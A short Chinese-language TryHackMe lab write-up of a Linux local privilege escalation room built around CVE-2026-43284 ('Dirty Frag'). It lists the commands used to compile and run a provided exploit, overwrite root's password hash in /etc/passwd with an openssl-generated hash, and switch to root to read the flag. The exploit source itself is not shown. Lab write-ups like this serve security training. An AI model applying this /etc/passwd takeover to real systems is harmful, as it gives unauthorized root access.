
TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup
房间: CVE-2026-43284: Dirty Frag 类别: Linux 权限提升 作者: (我的主页)
Dirty Frag 是一个围绕 CVE-2026-43284 构建的连环 Linux 本地权限提升(LPE)房间。目标是通过利用提供的概念验证漏洞利用,从非特权 shell 提升到 root。
列出工作目录可以找到该漏洞利用提供的文件:
$ ls
README.txt
exp
exp.c
exp.c — 漏洞利用源代码exp — 预编译二进制文件(可能与目标环境不匹配)README.txt — 漏洞利用附带的使用说明由于提供的 exp 二进制文件可能与目标的精确环境不兼容,更安全的做法是从源代码重新构建:
$ gcc -O0 -Wall -o exp exp.c -lutil
-O0 禁用编译器优化,使行为可预测且与源代码一致-Wall 启用编译器警告,有助于检查构建是否正确-lutil 链接 libutil —— 当代码使用伪终端(pty)函数时通常需要$ ./exp
运行编译后的漏洞利用会触发底层缺陷,从而获得对一个文件的写权限,而该文件通常对非特权用户应为只读——此处即 /etc/passwd。
获得写权限后,为 root 生成一个新的密码哈希:
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..
该哈希被写入 /etc/passwd,替换 root 现有的哈希字段:
$ nano /etc/passwd
现在已知 root 的密码,切换用户就很简单了:
$ su root
$ cat /root/flag.txt
THM{REDACTED}
本文记录了一个已完成的 TryHackMe 房间,仅供教育目的。目标环境是 TryHackMe 提供的一台故意存在漏洞的机器。